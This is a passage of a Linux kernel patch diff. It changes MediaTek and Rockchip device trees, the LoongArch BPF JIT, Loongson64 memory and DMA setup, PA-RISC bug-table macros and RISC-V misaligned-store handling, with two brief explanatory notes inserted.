+ 	wifi_pins_pwrseq: wifi-pins-pwrseq {
+-		pins_wifi_enable {
++		pins-wifi-enable {
+ 			pinmux = <PINMUX_GPIO119__FUNC_GPIO119>;
+ 			output-low;
+ 		};
+ 	};
+ 
+ 	wifi_pins_wakeup: wifi-pins-wakeup {
+-		pins_wifi_wakeup {
++		pins-wifi-wakeup {
+ 			pinmux = <PINMUX_GPIO113__FUNC_GPIO113>;
+ 			input-enable;
+ 		};
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-pumpkin.dts b/arch/arm64/boot/dts/mediatek/mt8183-pumpkin.dts
+index a1d01639df30a..dd8d39861d9ca 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-pumpkin.dts
++++ b/arch/arm64/boot/dts/mediatek/mt8183-pumpkin.dts
+@@ -178,7 +178,7 @@
+ 
+ &pio {
+ 	i2c_pins_0: i2c0 {
+-		pins_i2c{
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO82__FUNC_SDA0>,
+ 				 <PINMUX_GPIO83__FUNC_SCL0>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -187,7 +187,7 @@
+ 	};
+ 
+ 	i2c_pins_1: i2c1 {
+-		pins_i2c{
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO81__FUNC_SDA1>,
+ 				 <PINMUX_GPIO84__FUNC_SCL1>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -196,7 +196,7 @@
+ 	};
+ 
+ 	i2c_pins_2: i2c2 {
+-		pins_i2c{
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO103__FUNC_SCL2>,
+ 				 <PINMUX_GPIO104__FUNC_SDA2>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -205,7 +205,7 @@
+ 	};
+ 
+ 	i2c_pins_3: i2c3 {
+-		pins_i2c{
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO50__FUNC_SCL3>,
+ 				 <PINMUX_GPIO51__FUNC_SDA3>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -214,7 +214,7 @@
+ 	};
+ 
+ 	i2c_pins_4: i2c4 {
+-		pins_i2c{
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO105__FUNC_SCL4>,
+ 				 <PINMUX_GPIO106__FUNC_SDA4>;
+ 			mediatek,pull-up-adv = <3>;
+@@ -223,7 +223,7 @@
+ 	};
+ 
+ 	i2c_pins_5: i2c5 {
+-		pins_i2c{
++		pins_i2c {
+ 			pinmux = <PINMUX_GPIO48__FUNC_SCL5>,
+ 				 <PINMUX_GPIO49__FUNC_SDA5>;
+ 			mediatek,pull-up-adv = <3>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183.dtsi b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+index 268a1f28af8ce..10779a9947fe2 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+@@ -1136,127 +1136,6 @@
+ 			nvmem-cell-names = "calibration-data";
+ 		};
+ 
+-		thermal_zones: thermal-zones {
+-			cpu_thermal: cpu-thermal {
+-				polling-delay-passive = <100>;
+-				polling-delay = <500>;
+-				thermal-sensors = <&thermal 0>;
+-				sustainable-power = <5000>;
+-
+-				trips {
+-					threshold: trip-point0 {
+-						temperature = <68000>;
+-						hysteresis = <2000>;
+-						type = "passive";
+-					};
+-
+-					target: trip-point1 {
+-						temperature = <80000>;
+-						hysteresis = <2000>;
+-						type = "passive";
+-					};
+-
+-					cpu_crit: cpu-crit {
+-						temperature = <115000>;
+-						hysteresis = <2000>;
+-						type = "critical";
+-					};
+-				};
+-
+-				cooling-maps {
+-					map0 {
+-						trip = <&target>;
+-						cooling-device = <&cpu0
+-							THERMAL_NO_LIMIT
+-							THERMAL_NO_LIMIT>,
+-								 <&cpu1
+-							THERMAL_NO_LIMIT
+-							THERMAL_NO_LIMIT>,
+-								 <&cpu2
+-							THERMAL_NO_LIMIT
+-							THERMAL_NO_LIMIT>,
+-								 <&cpu3
+-							THERMAL_NO_LIMIT
+-							THERMAL_NO_LIMIT>;
+-						contribution = <3072>;
+-					};
+-					map1 {
+-						trip = <&target>;
+-						cooling-device = <&cpu4
+-							THERMAL_NO_LIMIT
+-							THERMAL_NO_LIMIT>,
+-								 <&cpu5
+-							THERMAL_NO_LIMIT
+-							THERMAL_NO_LIMIT>,
+-								 <&cpu6
+-							THERMAL_NO_LIMIT
+-							THERMAL_NO_LIMIT>,
+-								 <&cpu7
+-							THERMAL_NO_LIMIT
+-							THERMAL_NO_LIMIT>;
+-						contribution = <1024>;
+-					};
+-				};
+-			};
+-
+-			/* The tzts1 ~ tzts6 don't need to polling */
+-			/* The tzts1 ~ tzts6 don't need to thermal throttle */
+-
+-			tzts1: tzts1 {
+-				polling-delay-passive = <0>;
+-				polling-delay = <0>;
+-				thermal-sensors = <&thermal 1>;
+-				sustainable-power = <5000>;
+-				trips {};
+-				cooling-maps {};
+-			};
+-
+-			tzts2: tzts2 {
+-				polling-delay-passive = <0>;
+-				polling-delay = <0>;
+-				thermal-sensors = <&thermal 2>;
+-				sustainable-power = <5000>;
+-				trips {};
+-				cooling-maps {};
+-			};
+-
+-			tzts3: tzts3 {
+-				polling-delay-passive = <0>;
+-				polling-delay = <0>;
+-				thermal-sensors = <&thermal 3>;
+-				sustainable-power = <5000>;
+-				trips {};
+-				cooling-maps {};
+-			};
+-
+-			tzts4: tzts4 {
+-				polling-delay-passive = <0>;
+-				polling-delay = <0>;
+-				thermal-sensors = <&thermal 4>;
+-				sustainable-power = <5000>;
+-				trips {};
+-				cooling-maps {};
+-			};
+-
+-			tzts5: tzts5 {
+-				polling-delay-passive = <0>;
+-				polling-delay = <0>;
+-				thermal-sensors = <&thermal 5>;
+-				sustainable-power = <5000>;
+-				trips {};
+-				cooling-maps {};
+-			};
+-
+-			tztsABB: tztsABB {
+-				polling-delay-passive = <0>;
+-				polling-delay = <0>;
+-				thermal-sensors = <&thermal 6>;
+-				sustainable-power = <5000>;
+-				trips {};
+-				cooling-maps {};
+-			};
+-		};
+-
+ 		pwm0: pwm@1100e000 {
+ 			compatible = "mediatek,mt8183-disp-pwm";
+ 			reg = <0 0x1100e000 0 0x1000>;
+@@ -2031,4 +1910,125 @@
+ 			power-domains = <&spm MT8183_POWER_DOMAIN_CAM>;
+ 		};
+ 	};
++
++	thermal_zones: thermal-zones {
++		cpu_thermal: cpu-thermal {
++			polling-delay-passive = <100>;
++			polling-delay = <500>;
++			thermal-sensors = <&thermal 0>;
++			sustainable-power = <5000>;
++
++			trips {
++				threshold: trip-point0 {
++					temperature = <68000>;
++					hysteresis = <2000>;
++					type = "passive";
++				};
++
++				target: trip-point1 {
++					temperature = <80000>;
++					hysteresis = <2000>;
++					type = "passive";
++				};
++
++				cpu_crit: cpu-crit {
++					temperature = <115000>;
++					hysteresis = <2000>;
++					type = "critical";
++				};
++			};
++
++			cooling-maps {
++				map0 {
++					trip = <&target>;
++					cooling-device = <&cpu0
++						THERMAL_NO_LIMIT
++						THERMAL_NO_LIMIT>,
++							 <&cpu1
++						THERMAL_NO_LIMIT
++						THERMAL_NO_LIMIT>,
++							 <&cpu2
++						THERMAL_NO_LIMIT
++						THERMAL_NO_LIMIT>,
++							 <&cpu3
++						THERMAL_NO_LIMIT
++						THERMAL_NO_LIMIT>;
++					contribution = <3072>;
++				};
++				map1 {
++					trip = <&target>;
++					cooling-device = <&cpu4
++						THERMAL_NO_LIMIT
++						THERMAL_NO_LIMIT>,
++							 <&cpu5
++						THERMAL_NO_LIMIT
++						THERMAL_NO_LIMIT>,
++							 <&cpu6
++						THERMAL_NO_LIMIT
++						THERMAL_NO_LIMIT>,
++							 <&cpu7
++						THERMAL_NO_LIMIT
++						THERMAL_NO_LIMIT>;
++					contribution = <1024>;
++				};
++			};
++		};
++
++		/* The tzts1 ~ tzts6 don't need to polling */
++		/* The tzts1 ~ tzts6 don't need to thermal throttle */
++
++		tzts1: tzts1 {
++			polling-delay-passive = <0>;
++			polling-delay = <0>;
++			thermal-sensors = <&thermal 1>;
++			sustainable-power = <5000>;
++			trips {};
++			cooling-maps {};
++		};
++
++		tzts2: tzts2 {
++			polling-delay-passive = <0>;
++			polling-delay = <0>;
++			thermal-sensors = <&thermal 2>;
++			sustainable-power = <5000>;
++			trips {};
++			cooling-maps {};
++		};
++
++		tzts3: tzts3 {
++			polling-delay-passive = <0>;
++			polling-delay = <0>;
++			thermal-sensors = <&thermal 3>;
++			sustainable-power = <5000>;
++			trips {};
++			cooling-maps {};
++		};
++
++		tzts4: tzts4 {
++			polling-delay-passive = <0>;
++			polling-delay = <0>;
++			thermal-sensors = <&thermal 4>;
++			sustainable-power = <5000>;
++			trips {};
++			cooling-maps {};
++		};
++
++		tzts5: tzts5 {
++			polling-delay-passive = <0>;
++			polling-delay = <0>;
++			thermal-sensors = <&thermal 5>;
++			sustainable-power = <5000>;
++			trips {};
++			cooling-maps {};
++		};
++
++		tztsABB: tztsABB {
++			polling-delay-passive = <0>;
++			polling-delay = <0>;
++			thermal-sensors = <&thermal 6>;
++			sustainable-power = <5000>;
++			trips {};
++			cooling-maps {};
++		};
++	};
+ };
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195-cherry.dtsi b/arch/arm64/boot/dts/mediatek/mt8195-cherry.dtsi
+index 9b62e161db261..4b8a1c462906e 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195-cherry.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8195-cherry.dtsi
+@@ -207,7 +207,7 @@
+ 	pinctrl-0 = <&i2c7_pins>;
+ 
+ 	pmic@34 {
+-		#interrupt-cells = <1>;
++		#interrupt-cells = <2>;
+ 		compatible = "mediatek,mt6360";
+ 		reg = <0x34>;
+ 		interrupt-controller;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195.dtsi b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+index ef2764a595eda..414cbe3451270 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+@@ -471,6 +471,8 @@
+ 
+ 					power-domain@MT8195_POWER_DOMAIN_VENC_CORE1 {
+ 						reg = <MT8195_POWER_DOMAIN_VENC_CORE1>;
++						clocks = <&vencsys_core1 CLK_VENC_CORE1_LARB>;
++						clock-names = "venc1-larb";
+ 						mediatek,infracfg = <&infracfg_ao>;
+ 						#power-domain-cells = <0>;
+ 					};
+@@ -533,6 +535,8 @@
+ 
+ 						power-domain@MT8195_POWER_DOMAIN_VENC {
+ 							reg = <MT8195_POWER_DOMAIN_VENC>;
++							clocks = <&vencsys CLK_VENC_LARB>;
++							clock-names = "venc0-larb";
+ 							mediatek,infracfg = <&infracfg_ao>;
+ 							#power-domain-cells = <0>;
+ 						};
+@@ -1985,7 +1989,7 @@
+ 			reg = <0 0x1b010000 0 0x1000>;
+ 			mediatek,larb-id = <20>;
+ 			mediatek,smi = <&smi_common_vpp>;
+-			clocks = <&vencsys_core1 CLK_VENC_CORE1_LARB>,
++			clocks = <&vencsys_core1 CLK_VENC_CORE1_VENC>,
+ 				 <&vencsys_core1 CLK_VENC_CORE1_GALS>,
+ 				 <&vppsys0 CLK_VPP0_GALS_VDO0_VDO1_VENCSYS_CORE1>;
+ 			clock-names = "apb", "smi", "gals";
+diff --git a/arch/arm64/boot/dts/rockchip/rk3328.dtsi b/arch/arm64/boot/dts/rockchip/rk3328.dtsi
+index 49ae15708a0b6..905a50aa5dc38 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3328.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3328.dtsi
+@@ -666,7 +666,7 @@
+ 
+ 	vdec: video-codec@ff360000 {
+ 		compatible = "rockchip,rk3328-vdec", "rockchip,rk3399-vdec";
+-		reg = <0x0 0xff360000 0x0 0x400>;
++		reg = <0x0 0xff360000 0x0 0x480>;
+ 		interrupts = <GIC_SPI 7 IRQ_TYPE_LEVEL_HIGH>;
+ 		clocks = <&cru ACLK_RKVDEC>, <&cru HCLK_RKVDEC>,
+ 			 <&cru SCLK_VDEC_CABAC>, <&cru SCLK_VDEC_CORE>;
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399.dtsi b/arch/arm64/boot/dts/rockchip/rk3399.dtsi
+index 5f3caf01badeb..a7e6eccb14cc6 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399.dtsi
+@@ -1062,7 +1062,9 @@
+ 			power-domain@RK3399_PD_VDU {
+ 				reg = <RK3399_PD_VDU>;
+ 				clocks = <&cru ACLK_VDU>,
+-					 <&cru HCLK_VDU>;
++					 <&cru HCLK_VDU>,
++					 <&cru SCLK_VDU_CA>,
++					 <&cru SCLK_VDU_CORE>;
+ 				pm_qos = <&qos_video_m1_r>,
+ 					 <&qos_video_m1_w>;
+ 				#power-domain-cells = <0>;
+@@ -1338,7 +1340,7 @@
+ 
+ 	vdec: video-codec@ff660000 {
+ 		compatible = "rockchip,rk3399-vdec";
+-		reg = <0x0 0xff660000 0x0 0x400>;
++		reg = <0x0 0xff660000 0x0 0x480>;
+ 		interrupts = <GIC_SPI 116 IRQ_TYPE_LEVEL_HIGH 0>;
+ 		clocks = <&cru ACLK_VDU>, <&cru HCLK_VDU>,
+ 			 <&cru SCLK_VDU_CA>, <&cru SCLK_VDU_CORE>;
+diff --git a/arch/loongarch/net/bpf_jit.c b/arch/loongarch/net/bpf_jit.c
+index 82b4402810da0..40ed49d9adff5 100644
+--- a/arch/loongarch/net/bpf_jit.c
++++ b/arch/loongarch/net/bpf_jit.c
+@@ -796,8 +796,6 @@ static int build_insn(const struct bpf_insn *insn, struct jit_ctx *ctx, bool ext
+ 
+ 	/* function return */
+ 	case BPF_JMP | BPF_EXIT:
+-		emit_sext_32(ctx, regmap[BPF_REG_0], true);
+-
+ 		if (i == ctx->prog->len - 1)
+ 			break;
+ 
+@@ -844,14 +842,8 @@ static int build_insn(const struct bpf_insn *insn, struct jit_ctx *ctx, bool ext
+ 			}
+ 			break;
+ 		case BPF_DW:
+-			if (is_signed_imm12(off)) {
+-				emit_insn(ctx, ldd, dst, src, off);
+-			} else if (is_signed_imm14(off)) {
+-				emit_insn(ctx, ldptrd, dst, src, off);
+-			} else {
+-				move_imm(ctx, t1, off, is32);
+-				emit_insn(ctx, ldxd, dst, src, t1);
+-			}
++			move_imm(ctx, t1, off, is32);
++			emit_insn(ctx, ldxd, dst, src, t1);
+ 			break;
+ 		}
+ 		break;
+diff --git a/arch/mips/Kconfig b/arch/mips/Kconfig
+index 0e62f5edaee2e..585783c9907ef 100644
+--- a/arch/mips/Kconfig
++++ b/arch/mips/Kconfig
+@@ -483,6 +483,7 @@ config MACH_LOONGSON2EF
+ 
+ config MACH_LOONGSON64
+ 	bool "Loongson 64-bit family of machines"
++	select ARCH_DMA_DEFAULT_COHERENT
+ 	select ARCH_SPARSEMEM_ENABLE
+ 	select ARCH_MIGHT_HAVE_PC_PARPORT
+ 	select ARCH_MIGHT_HAVE_PC_SERIO
+@@ -1304,6 +1305,7 @@ config CPU_LOONGSON64
+ 	select CPU_SUPPORTS_MSA
+ 	select CPU_DIEI_BROKEN if !LOONGSON3_ENHANCEMENT
+ 	select CPU_MIPSR2_IRQ_VI
++	select DMA_NONCOHERENT
+ 	select WEAK_ORDERING
+ 	select WEAK_REORDERING_BEYOND_LLSC
+ 	select MIPS_ASID_BITS_VARIABLE
+diff --git a/arch/mips/include/asm/mach-loongson64/boot_param.h b/arch/mips/include/asm/mach-loongson64/boot_param.h
+index 035b1a69e2d00..e007edd6b60a7 100644
+--- a/arch/mips/include/asm/mach-loongson64/boot_param.h
++++ b/arch/mips/include/asm/mach-loongson64/boot_param.h
+@@ -14,7 +14,11 @@
+ #define ADAPTER_ROM		8
+ #define ACPI_TABLE		9
+ #define SMBIOS_TABLE		10
+-#define MAX_MEMORY_TYPE		11
++#define UMA_VIDEO_RAM		11
++#define VUMA_VIDEO_RAM		12
++#define MAX_MEMORY_TYPE		13
++
++#define MEM_SIZE_IS_IN_BYTES	(1 << 31)
+ 
+ #define LOONGSON3_BOOT_MEM_MAP_MAX 128
+ struct efi_memory_map_loongson {
+@@ -117,7 +121,8 @@ struct irq_source_routing_table {
+ 	u64 pci_io_start_addr;
+ 	u64 pci_io_end_addr;
+ 	u64 pci_config_addr;
+-	u32 dma_mask_bits;
++	u16 dma_mask_bits;
++	u16 dma_noncoherent;
+ } __packed;
+ 
+ struct interface_info {
+diff --git a/arch/mips/kernel/process.c b/arch/mips/kernel/process.c
+index bbe9ce471791e..17d80e2f2e4cb 100644
+--- a/arch/mips/kernel/process.c
++++ b/arch/mips/kernel/process.c
+@@ -121,6 +121,19 @@ int copy_thread(struct task_struct *p, const struct kernel_clone_args *args)
+ 	/*  Put the stack after the struct pt_regs.  */
+ 	childksp = (unsigned long) childregs;
+ 	p->thread.cp0_status = (read_c0_status() & ~(ST0_CU2|ST0_CU1)) | ST0_KERNEL_CUMASK;
++
++	/*
++	 * New tasks lose permission to use the fpu. This accelerates context
++	 * switching for most programs since they don't use the fpu.
++	 */
++	clear_tsk_thread_flag(p, TIF_USEDFPU);
++	clear_tsk_thread_flag(p, TIF_USEDMSA);
++	clear_tsk_thread_flag(p, TIF_MSA_CTX_LIVE);
++
++#ifdef CONFIG_MIPS_MT_FPAFF
++	clear_tsk_thread_flag(p, TIF_FPUBOUND);
++#endif /* CONFIG_MIPS_MT_FPAFF */
++
+ 	if (unlikely(args->fn)) {
+ 		/* kernel thread */
+ 		unsigned long status = p->thread.cp0_status;
+@@ -149,20 +162,8 @@ int copy_thread(struct task_struct *p, const struct kernel_clone_args *args)
+ 	p->thread.reg29 = (unsigned long) childregs;
+ 	p->thread.reg31 = (unsigned long) ret_from_fork;
+ 
+-	/*
+-	 * New tasks lose permission to use the fpu. This accelerates context
+-	 * switching for most programs since they don't use the fpu.
+-	 */
+ 	childregs->cp0_status &= ~(ST0_CU2|ST0_CU1);
+ 
+-	clear_tsk_thread_flag(p, TIF_USEDFPU);
+-	clear_tsk_thread_flag(p, TIF_USEDMSA);
+-	clear_tsk_thread_flag(p, TIF_MSA_CTX_LIVE);
+-
+-#ifdef CONFIG_MIPS_MT_FPAFF
+-	clear_tsk_thread_flag(p, TIF_FPUBOUND);
+-#endif /* CONFIG_MIPS_MT_FPAFF */
+-
+ #ifdef CONFIG_MIPS_FP_SUPPORT
+ 	atomic_set(&p->thread.bd_emu_frame, BD_EMUFRAME_NONE);
+ #endif
+diff --git a/arch/mips/loongson64/env.c b/arch/mips/loongson64/env.c
+index c961e2999f15a..ef3750a6ffacf 100644
+--- a/arch/mips/loongson64/env.c
++++ b/arch/mips/loongson64/env.c
+@@ -13,6 +13,8 @@
+  * Copyright (C) 2009 Lemote Inc.
+  * Author: Wu Zhangjin, wuzhangjin@gmail.com
+  */
++
++#include <linux/dma-map-ops.h>
+ #include <linux/export.h>
+ #include <linux/pci_ids.h>
+ #include <asm/bootinfo.h>
+@@ -147,8 +149,14 @@ void __init prom_lefi_init_env(void)
+ 
+ 	loongson_sysconf.dma_mask_bits = eirq_source->dma_mask_bits;
+ 	if (loongson_sysconf.dma_mask_bits < 32 ||
+-		loongson_sysconf.dma_mask_bits > 64)
++			loongson_sysconf.dma_mask_bits > 64) {
+ 		loongson_sysconf.dma_mask_bits = 32;
++		dma_default_coherent = true;
++	} else {
++		dma_default_coherent = !eirq_source->dma_noncoherent;
++	}
++
++	pr_info("Firmware: Coherent DMA: %s\n", dma_default_coherent ? "on" : "off");
+ 
+ 	loongson_sysconf.restart_addr = boot_p->reset_system.ResetWarm;
+ 	loongson_sysconf.poweroff_addr = boot_p->reset_system.Shutdown;
+diff --git a/arch/mips/loongson64/init.c b/arch/mips/loongson64/init.c
+index ee8de1735b7c0..f25caa6aa9d30 100644
+--- a/arch/mips/loongson64/init.c
++++ b/arch/mips/loongson64/init.c
+@@ -49,8 +49,7 @@ void virtual_early_config(void)
+ void __init szmem(unsigned int node)
+ {
+ 	u32 i, mem_type;
+-	static unsigned long num_physpages;
+-	u64 node_id, node_psize, start_pfn, end_pfn, mem_start, mem_size;
++	phys_addr_t node_id, mem_start, mem_size;
+ 
+ 	/* Otherwise come from DTB */
+ 	if (loongson_sysconf.fw_interface != LOONGSON_LEFI)
+@@ -64,30 +63,46 @@ void __init szmem(unsigned int node)
+ 
+ 		mem_type = loongson_memmap->map[i].mem_type;
+ 		mem_size = loongson_memmap->map[i].mem_size;
+-		mem_start = loongson_memmap->map[i].mem_start;
++
++		/* Memory size comes in MB if MEM_SIZE_IS_IN_BYTES is not set */
++		if (mem_size & MEM_SIZE_IS_IN_BYTES)
++			mem_size &= ~MEM_SIZE_IS_IN_BYTES;
++		else
++			mem_size = mem_size << 20;
++
++		mem_start = (node_id << 44) | loongson_memmap->map[i].mem_start;
+ 
+ 		switch (mem_type) {
+ 		case SYSTEM_RAM_LOW:
+ 		case SYSTEM_RAM_HIGH:
+-			start_pfn = ((node_id << 44) + mem_start) >> PAGE_SHIFT;
+-			node_psize = (mem_size << 20) >> PAGE_SHIFT;
+-			end_pfn  = start_pfn + node_psize;
+-			num_physpages += node_psize;
+-			pr_info("Node%d: mem_type:%d, mem_start:0x%llx, mem_size:0x%llx MB\n",
+-				(u32)node_id, mem_type, mem_start, mem_size);
+-			pr_info("       start_pfn:0x%llx, end_pfn:0x%llx, num_physpages:0x%lx\n",
+-				start_pfn, end_pfn, num_physpages);
+-			memblock_add_node(PFN_PHYS(start_pfn),
+-					  PFN_PHYS(node_psize), node,
++		case UMA_VIDEO_RAM:
++			pr_info("Node %d, mem_type:%d\t[%pa], %pa bytes usable\n",
++				(u32)node_id, mem_type, &mem_start, &mem_size);
++			memblock_add_node(mem_start, mem_size, node,
+ 					  MEMBLOCK_NONE);
+ 			break;
+ 		case SYSTEM_RAM_RESERVED:
+-			pr_info("Node%d: mem_type:%d, mem_start:0x%llx, mem_size:0x%llx MB\n",
+-				(u32)node_id, mem_type, mem_start, mem_size);
+-			memblock_reserve(((node_id << 44) + mem_start), mem_size << 20);
++		case VIDEO_ROM:
++		case ADAPTER_ROM:
++		case ACPI_TABLE:
++		case SMBIOS_TABLE:
++			pr_info("Node %d, mem_type:%d\t[%pa], %pa bytes reserved\n",
++				(u32)node_id, mem_type, &mem_start, &mem_size);
++			memblock_reserve(mem_start, mem_size);
++			break;
++		/* We should not reserve VUMA_VIDEO_RAM as it overlaps with MMIO */
++		case VUMA_VIDEO_RAM:
++		default:
++			pr_info("Node %d, mem_type:%d\t[%pa], %pa bytes unhandled\n",
++				(u32)node_id, mem_type, &mem_start, &mem_size);
+ 			break;
+ 		}
+ 	}
++
++	/* Reserve vgabios if it comes from firmware */
++	if (loongson_sysconf.vgabios_addr)
++		memblock_reserve(virt_to_phys((void *)loongson_sysconf.vgabios_addr),
++				SZ_256K);
+ }
+ 
+ #ifndef CONFIG_NUMA
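
The size handling above can be restated compactly. Old LEFI firmware reports
map entries in megabytes; newer firmware sets MEM_SIZE_IS_IN_BYTES (bit 31)
to pass byte-exact sizes. A hypothetical helper, not part of the patch,
assuming flagged sizes fit in 31 bits:

	static u64 lefi_mem_size_bytes(u32 raw)
	{
		if (raw & MEM_SIZE_IS_IN_BYTES)
			return raw & ~MEM_SIZE_IS_IN_BYTES;	/* already bytes */
		return (u64)raw << 20;				/* legacy: megabytes */
	}
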
+diff --git a/arch/parisc/Kconfig b/arch/parisc/Kconfig
+index 67c26e81e2150..345d5e021484c 100644
+--- a/arch/parisc/Kconfig
++++ b/arch/parisc/Kconfig
+@@ -105,9 +105,12 @@ config ARCH_HAS_ILOG2_U64
+ 	default n
+ 
+ config GENERIC_BUG
+-	bool
+-	default y
++	def_bool y
+ 	depends on BUG
++	select GENERIC_BUG_RELATIVE_POINTERS if 64BIT
++
++config GENERIC_BUG_RELATIVE_POINTERS
++	bool
+ 
+ config GENERIC_HWEIGHT
+ 	bool
+diff --git a/arch/parisc/include/asm/bug.h b/arch/parisc/include/asm/bug.h
+index b9cad0bb4461b..833555f74ffa7 100644
+--- a/arch/parisc/include/asm/bug.h
++++ b/arch/parisc/include/asm/bug.h
+@@ -17,26 +17,27 @@
+ #define	PARISC_BUG_BREAK_ASM	"break 0x1f, 0x1fff"
+ #define	PARISC_BUG_BREAK_INSN	0x03ffe01f  /* PARISC_BUG_BREAK_ASM */
+ 
+-#if defined(CONFIG_64BIT)
+-#define ASM_WORD_INSN		".dword\t"
++#ifdef CONFIG_GENERIC_BUG_RELATIVE_POINTERS
++# define __BUG_REL(val) ".word " __stringify(val) " - ."
+ #else
+-#define ASM_WORD_INSN		".word\t"
++# define __BUG_REL(val) ".word " __stringify(val)
+ #endif
+ 
++
+ #ifdef CONFIG_DEBUG_BUGVERBOSE
+ #define BUG()								\
+ 	do {								\
+ 		asm volatile("\n"					\
+ 			     "1:\t" PARISC_BUG_BREAK_ASM "\n"		\
+ 			     "\t.pushsection __bug_table,\"a\"\n"	\
+-			     "\t.align %4\n"				\
+-			     "2:\t" ASM_WORD_INSN "1b, %c0\n"		\
++			     "\t.align 4\n"				\
++			     "2:\t" __BUG_REL(1b) "\n"			\
++			     "\t" __BUG_REL(%c0)  "\n"			\
+ 			     "\t.short %1, %2\n"			\
+-			     "\t.blockz %3-2*%4-2*2\n"			\
++			     "\t.blockz %3-2*4-2*2\n"			\
+ 			     "\t.popsection"				\
+ 			     : : "i" (__FILE__), "i" (__LINE__),	\
+-			     "i" (0), "i" (sizeof(struct bug_entry)),	\
+-			     "i" (sizeof(long)) );			\
++			     "i" (0), "i" (sizeof(struct bug_entry)) );	\
+ 		unreachable();						\
+ 	} while(0)
+ 
+@@ -54,15 +55,15 @@
+ 		asm volatile("\n"					\
+ 			     "1:\t" PARISC_BUG_BREAK_ASM "\n"		\
+ 			     "\t.pushsection __bug_table,\"a\"\n"	\
+-			     "\t.align %4\n"				\
+-			     "2:\t" ASM_WORD_INSN "1b, %c0\n"		\
++			     "\t.align 4\n"				\
++			     "2:\t" __BUG_REL(1b) "\n"			\
++			     "\t" __BUG_REL(%c0)  "\n"			\
+ 			     "\t.short %1, %2\n"			\
+-			     "\t.blockz %3-2*%4-2*2\n"			\
++			     "\t.blockz %3-2*4-2*2\n"			\
+ 			     "\t.popsection"				\
+ 			     : : "i" (__FILE__), "i" (__LINE__),	\
+ 			     "i" (BUGFLAG_WARNING|(flags)),		\
+-			     "i" (sizeof(struct bug_entry)),		\
+-			     "i" (sizeof(long)) );			\
++			     "i" (sizeof(struct bug_entry)) );		\
+ 	} while(0)
+ #else
+ #define __WARN_FLAGS(flags)						\
+@@ -70,14 +71,13 @@
+ 		asm volatile("\n"					\
+ 			     "1:\t" PARISC_BUG_BREAK_ASM "\n"		\
+ 			     "\t.pushsection __bug_table,\"a\"\n"	\
+-			     "\t.align %2\n"				\
+-			     "2:\t" ASM_WORD_INSN "1b\n"		\
++			     "\t.align 4\n"				\
++			     "2:\t" __BUG_REL(1b) "\n"			\
+ 			     "\t.short %0\n"				\
+-			     "\t.blockz %1-%2-2\n"			\
++			     "\t.blockz %1-4-2\n"			\
+ 			     "\t.popsection"				\
+ 			     : : "i" (BUGFLAG_WARNING|(flags)),		\
+-			     "i" (sizeof(struct bug_entry)),		\
+-			     "i" (sizeof(long)) );			\
++			     "i" (sizeof(struct bug_entry)) );		\
+ 	} while(0)
+ #endif
+ 
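
For context, GENERIC_BUG_RELATIVE_POINTERS makes each bug_table entry store a
32-bit self-relative offset (".word 1b - .") instead of a 64-bit absolute
address, shrinking the table on 64-bit parisc and removing the need for
relocations. Roughly the pattern the generic lib/bug.c code uses to recover
the address under this option:

	static inline unsigned long bug_addr(const struct bug_entry *bug)
	{
	#ifdef CONFIG_GENERIC_BUG_RELATIVE_POINTERS
		/* the displacement is relative to the field's own location */
		return (unsigned long)&bug->bug_addr_disp + bug->bug_addr_disp;
	#else
		return bug->bug_addr;
	#endif
	}
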
+diff --git a/arch/riscv/Kconfig.socs b/arch/riscv/Kconfig.socs
+index 69774bb362d6a..29d78eefc8894 100644
+--- a/arch/riscv/Kconfig.socs
++++ b/arch/riscv/Kconfig.socs
+@@ -23,6 +23,7 @@ config SOC_STARFIVE
+ 	select PINCTRL
+ 	select RESET_CONTROLLER
+ 	select SIFIVE_PLIC
++	select ARM_AMBA
+ 	help
+ 	  This enables support for StarFive SoC platform hardware.
+ 
+diff --git a/arch/riscv/kernel/traps_misaligned.c b/arch/riscv/kernel/traps_misaligned.c
+index 378f5b1514435..5348d842c7453 100644
+--- a/arch/riscv/kernel/traps_misaligned.c
++++ b/arch/riscv/kernel/traps_misaligned.c
+@@ -342,16 +342,14 @@ int handle_misaligned_store(struct pt_regs *regs)
+ 	} else if ((insn & INSN_MASK_C_SD) == INSN_MATCH_C_SD) {
+ 		len = 8;
+ 		val.data_ulong = GET_RS2S(insn, regs);
+-	} else if ((insn & INSN_MASK_C_SDSP) == INSN_MATCH_C_SDSP &&
+-		   ((insn >> SH_RD) & 0x1f)) {
++	} else if ((insn & INSN_MASK_C_SDSP) == INSN_MATCH_C_SDSP) {
+ 		len = 8;
+ 		val.data_ulong = GET_RS2C(insn, regs);
+ #endif
+ 	} else if ((insn & INSN_MASK_C_SW) == INSN_MATCH_C_SW) {
+ 		len = 4;
+ 		val.data_ulong = GET_RS2S(insn, regs);
+-	} else if ((insn & INSN_MASK_C_SWSP) == INSN_MATCH_C_SWSP &&
+-		   ((insn >> SH_RD) & 0x1f)) {
++	} else if ((insn & INSN_MASK_C_SWSP) == INSN_MATCH_C_SWSP) {
+ 		len = 4;
+ 		val.data_ulong = GET_RS2C(insn, regs);
+ 	} else {
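
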